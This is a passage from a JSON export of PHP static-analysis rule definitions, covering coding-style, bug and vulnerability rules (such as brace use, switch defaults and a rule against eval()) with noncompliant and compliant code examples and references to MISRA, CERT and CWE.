Martin in his book \"Principles of Object Oriented Design\", a class should\nhave only one responsibility:<\/p>\n<blockquote>\n  <p>If a class has more than one responsibility, then the responsibilities become coupled.<\/p>\n  <p>Changes to one responsibility may impair or inhibit the class' ability to meet the others.<\/p>\n  <p>This kind of coupling leads to fragile designs that break in unexpected ways when changed.<\/p>\n<\/blockquote>\n<p>Classes which rely on many other classes tend to aggregate too many responsibilities and should be split into several smaller ones.<\/p>\n<p>Nested classes dependencies are not counted as dependencies of the outer class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n  class Foo {            \/\/ Noncompliant - Foo depends on too many classes: T1, T2, T3, T4, T5, T6 and T7\n    \/**\n     * @var T1\n     *\/\n    public $a1;          \/\/ Foo is coupled to T1\n    \/**\n     * @var T2\n     *\/\n    protected $a2;       \/\/ Foo is coupled to T2\n    \/**\n     * @var T3\n     *\/\n    private $a3;         \/\/ Foo is coupled to T3\n\n    \/**\n     * @param T5\n     * @param T6\n     *\n     * @return T4\n     *\/\n    public function compute(T5 $a, $b) { \/\/ Foo is coupled to T4, T5 and T6\n      $result = new T7();     \/\/ Foo is coupled to T7\n      return $result;\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of classes a single class is allowed to depend upon","defaultValue":"20","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S121","repo":"php","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seems to be attached to the if statement, but that is only true for the first one:\nif (condition)\n  
executeSomething();\n  checkSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {\n  executeSomething();\n  checkSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n  <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n  <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S122","repo":"php","name":"Statements should be on separate lines","htmlDesc":"<p>For better readability, do not put more than one statement on a single line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(someCondition) doSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(someCondition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Anonymous functions containing a single statement are ignored.<\/p>\n<pre>\n$max_comparator = function ($v) { return $v &gt; 2; };           \/\/ Compliant\n$max_comparator = 
function ($v) { echo $v; return $v &gt; 2; };  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S125","repo":"php","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n  <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. <\/li>\n  <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n  <li> MISRA C:2012, Dir. 4.4 - Sections of code should not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S126","repo":"php","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. 
This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n  do_something();\n} else if (condition2) {\n  do_something_else();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1) {\n  do_something();\n} else if (condition2) {\n  do_something_else();\n} else {\n  throw new InvalidArgumentException('message');\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1264","repo":"php","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, but the init and increment expressions are missing, a <code>while<\/code>\nloop should be used instead to increase readability. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S127","repo":"php","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n  <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n  <li> When the stop condition depends upon a method call <\/li>\n  <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++) {\n  echo $i;\n  if(condition) {\n    $i = 20;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++) {\n  echo $i;\n}\n\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n  loop. <\/li>\n  <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. 
<\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S128","repo":"php","name":"Switch cases should end with an unconditional \"break\" statement","htmlDesc":"<p>When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While\nthis is sometimes intentional, it often is a mistake which leads to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:  \/\/ Both 'do_something()' and 'do_something_else()' will be executed. Is it on purpose?\n    do_something();\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:\n    do_something();\n    break;\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule is relaxed in the following cases:<\/p>\n<pre>\nswitch ($myVariable) {\n  case 0:                  \/\/ Empty case used to specify the same behavior for a group of cases.\n  case 1:\n    do_something();\n    break;\n  case 2:                  \/\/ Use of continue statement\n    continue;\n  case 3:                  \/\/ Case includes a jump statement (exit, return, break, etc.)\n    exit(0);\n  case 4:\n    echo 'Second case, which falls through';\n    \/\/ no break        &lt;- comment is used when fall-through is intentional in a non-empty case body\n  default:                 \/\/ For the last case, use of break statement is optional\n    doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.2 - An unconditional break statement shall terminate every non-empty switch clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C++:2008, 6-4-5 - An unconditional throw or break statement shall terminate every non-empty switch-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.3 - An unconditional break statement shall terminate every switch-clause <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/484.html\">MITRE, CWE-484<\/a> - Omitted Break Statement in Switch <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YIFLAQ\">CERT, MSC17-C.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZoFLAQ\">CERT, MSC18-CPP.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ewHAAQ\">CERT, MSC52-J.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1301","repo":"php","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($variable) {\n  case 0:\n    do_something();\n    break;\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($variable == 0) {\n  do_something();\n} else {\n  do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n  <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. 
<\/li>\n  <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S131","repo":"php","name":"Statements should end with a \"case default\" clause","htmlDesc":"<p>The requirement for a final <code>case default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain\na suitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a default case\nshould still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($param) {  \/\/missing default clause\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n}\n\nswitch ($param) {\n  default: \/\/ default clause should be the last one\n    error();\n    break;\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($param) {\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n  default:\n    error();\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n  <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n  <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S134","repo":"php","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements are a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n  if (condition1) {                  \/\/ Compliant - depth = 1\n    ...\n    if (condition2) {                \/\/ Compliant - depth = 2\n      ...\n      for($i = 0; $i &lt; 10; $i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n        ...\n        if (condition4) {            \/\/ Non-Compliant - depth = 4\n          if (condition5) {          \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n            ...\n          }\n          return;\n        }\n      }\n   
 }\n  }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S138","repo":"php","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"150","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S139","repo":"php","name":"Comments should not be located at the end of lines of code","htmlDesc":"<p>This rule verifies that single-line comments are not located at the ends of lines of code. 
The main idea behind this rule is that in order to be\nreally readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of\nthe code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.\nComments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a = $b + $c; \/\/ This is a trailing comment that can be very very long\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ This very long comment is better placed before the line of code\n$a = $b + $c;\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"legalTrailingCommentPattern","htmlDesc":"Pattern for text of trailing comments that are allowed. By default, comments containing only one word.","defaultValue":"^(\/\/|#)\\s*+[^\\s]++$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1479","repo":"php","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1481","repo":"php","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. 
Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n  $seconds = 0;   \/\/ seconds is never used\n  return $hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n  return $hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1488","repo":"php","name":"Local Variables should not be declared and then immediately returned or thrown","htmlDesc":"<p>Declaring a variable only to immediately return or throw it is a bad practice.<\/p>\n<p>Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this\nvariable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to\nknow exactly what will be returned.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n  $duration = ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000 ;\n  return $duration;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n  return ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1523","repo":"php","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. <\/p>\n<p>According to the PHP documentation:<\/p>\n<blockquote>\n  <p>The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. 
If you have\n  carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it\n  without properly validating it beforehand.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval($code_to_be_dynamically_executed)\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n  Evaluated Code ('Eval Injection') <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S1536","repo":"php","name":"Function argument names should be unique","htmlDesc":"<p>Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument\nhides all the previous arguments with the same name. This hiding makes no sense, reduces understandability and maintainability, and obviously can be\nerror prone. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute($a, $a, $c) { \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute($a, $b, $c) { \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1599","repo":"php","name":"Variable variables should not be used","htmlDesc":"<p>PHP's \"variable variables\" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$var = 'foo';\n$$var = 'bar';      \/\/Noncompliant\n$$$var = 'hello';  \/\/Noncompliant\n\necho $foo; \/\/will display 'bar'\necho $bar; \/\/will display 'hello'\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1600","repo":"php","name":"Deprecated predefined variables should not be used","htmlDesc":"<p>The following predefined variables are deprecated and should be replaced by the new versions:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Replace<\/th>\n      <th>With<\/th>\n    <\/tr>\n    <tr>\n      <td>$HTTP_SERVER_VARS<\/td>\n      <td>$_SERVER<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_GET_VARS<\/td>\n      <td>$_GET<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_POST_VARS<\/td>\n      <td>$_POST<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_POST_FILES<\/td>\n      <td>$_FILES<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_SESSION_VARS<\/td>\n      <td>$_SESSION<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_ENV_VARS<\/td>\n      <td>$_ENV<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_COOKIE_VARS<\/td>\n      <td>$_COOKIE<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho 'Name parameter value: ' . $HTTP_GET_VARS[\"name\"];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho 'Name parameter value: ' . $_GET[\"name\"];\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1603","repo":"php","name":"PHP 4 constructor declarations should not be used","htmlDesc":"<p>In PHP 4, any function with the same name as the nesting class was considered a class constructor. In PHP 5, this mechanism has been deprecated and\nthe \"__construct\" method name should be used instead. If both styles are present in the same class, PHP 5 will treat the function named \"__construct\"\nas the class constructor. 
<\/p>\n<p>This rule raises an issue for each method with the same name as the enclosing class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n  function Foo(){...}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n  function __construct(){...}\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1605","repo":"php","name":"\"__construct\" functions should not make PHP 4-style calls to parent constructors","htmlDesc":"<p>In PHP 5 both the way to declare a constructor and the way to make a call to a parent constructor have evolved. When declaring constructors with\nthe PHP5 <code>__construct<\/code> name, nested calls to parent constructors should also use the new <code>__construct<\/code> name.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo extends Bar {\n  function __construct() {\n    parent::Bar();\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo extends Bar {\n  function __construct() {\n    parent::__construct();\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1656","repo":"php","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. 
Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic function setName($name) {\n    $name = $name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function setName($name) {\n    $this-&gt;name = $name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1757","repo":"php","name":"\"<?php\" and \"<?=\" tags should be used","htmlDesc":"<p>Coding conventions allow teams to collaborate effectively. For maximum standardization and readability, PHP code should use the long <code>&lt;?php\n?&gt;<\/code> tags or the short-echo <code>&lt;?= ?&gt;<\/code> tags; it should not use the other tag variations.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?\n$foo = 1;\n?&gt;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n$foo = 1;\n?&gt;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1763","repo":"php","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>goto<\/code>) and <code>throw<\/code> expressions move\ncontrol flow out of the current code block. Typically, any statements in a block that come after a jump or <code>throw<\/code> are simply wasted\nkeystrokes lying in wait to confuse the unwary. <\/p>\n<p>Rarely, as illustrated below, code after a jump or <code>throw<\/code> is reachable. 
However, such code is difficult to understand, and should be\nrefactored. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction fun($a) {\n  $i = 10;\n  return $i + $a;\n  $i++;             \/\/ this is never executed\n}\n\nfunction foo($a) {\n  if ($a == 5) {\n    goto error;\n  } else {\n    \/\/ do the job\n  }\n  return;\n\n  error:\n    printf(\"don't use 5\"); \/\/ this is reachable but unreadable\n\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction fun($a) {\n  $i = 10;\n  return $i + $a;\n}\n\nfunction foo($a) {\n  if ($a == 5) {\n    handleError();\n  } else {\n    \/\/ do the job\n  }\n  return;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n  <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1764","repo":"php","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( $a == $a ) { \/\/ always true\n  doZ();\n}\nif ( $a != $a ) { \/\/ always false\n  doY();\n}\nif ( $a == $b &amp;&amp; $a == $b ) { \/\/ if the first one is true, the second one is too\n  doX();\n}\nif ( $a == $b || $a == $b ) { \/\/ if the first one is true, the second one is too\n  doW();\n}\n\n$j = 5 \/ 5; \/\/always 1\n$k = 5 - 5; \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\n$i = 1 &lt;&lt; 1; \/\/ Compliant\n$j = $a &lt;&lt; $a; \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href='\/coding_rules#rule_key=php%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1765","repo":"php","name":"The \"var\" keyword should not be used","htmlDesc":"<p>The PHP 4 method of declaring a variable, using the <code>var<\/code> keyword, was deprecated in early versions of PHP 5. Even though it's not\nconsidered deprecated in the most recent versions, it's nonetheless not best practice to use it. When <code>var<\/code> does appear, it is interpreted\nas a synonym for <code>public<\/code> and treated as such. 
